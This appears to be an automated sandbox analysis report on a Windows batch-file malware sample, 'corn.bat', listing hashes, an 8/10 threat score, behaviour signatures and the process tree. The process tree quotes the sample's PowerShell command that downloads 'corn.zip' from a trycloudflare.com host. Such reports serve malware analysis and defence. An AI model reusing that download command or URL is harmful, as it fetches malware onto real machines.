Analysis
-
max time kernel
122s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
30-09-2024 16:41
Static task
static1
Behavioral task
behavioral1
Sample
corn.bat
Resource
win7-20240903-en
windows7-x64
4 signatures
150 seconds
General
-
Target
corn.bat
-
Size
44KB
-
MD5
e7a2eb0f8ad72bceec84b48c85cebbef
-
SHA1
789f12e6755ba3e5995169f1ad575185360f4387
-
SHA256
23474c7aca0d40d8920ba6f5b0ad5646f8d04075976ab3a53837dbb19638766f
-
SHA512
aa66289e3b41c5dc7c9b9a03eb96a2dbd6a33a408af0136afeaec41759a4da782031098954091d76d39bbd67b574a0c590fdb774258d30abc4eb07ce337cd1b4
-
SSDEEP
192:ckKne+fzSOWATUVF+qP7Hg1OA93vOOefDU4x4qL3JEgA9tS/Le2MGmHUQjw:cku1WATOF+qP7g1j93vp34xp1AGP20Qw
Score
8/10
Malware Config
Signatures
-
pid Process 2132 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2132 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2132 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1672 wrote to memory of 2132 1672 cmd.exe 29 PID 1672 wrote to memory of 2132 1672 cmd.exe 29 PID 1672 wrote to memory of 2132 1672 cmd.exe 29
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\corn.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1672 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://ordinary-wild-victorian-victory.trycloudflare.com/corn.zip' -OutFile 'C:\Users\Admin\Downloads\corn.zip' } catch { exit 1 }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2132
-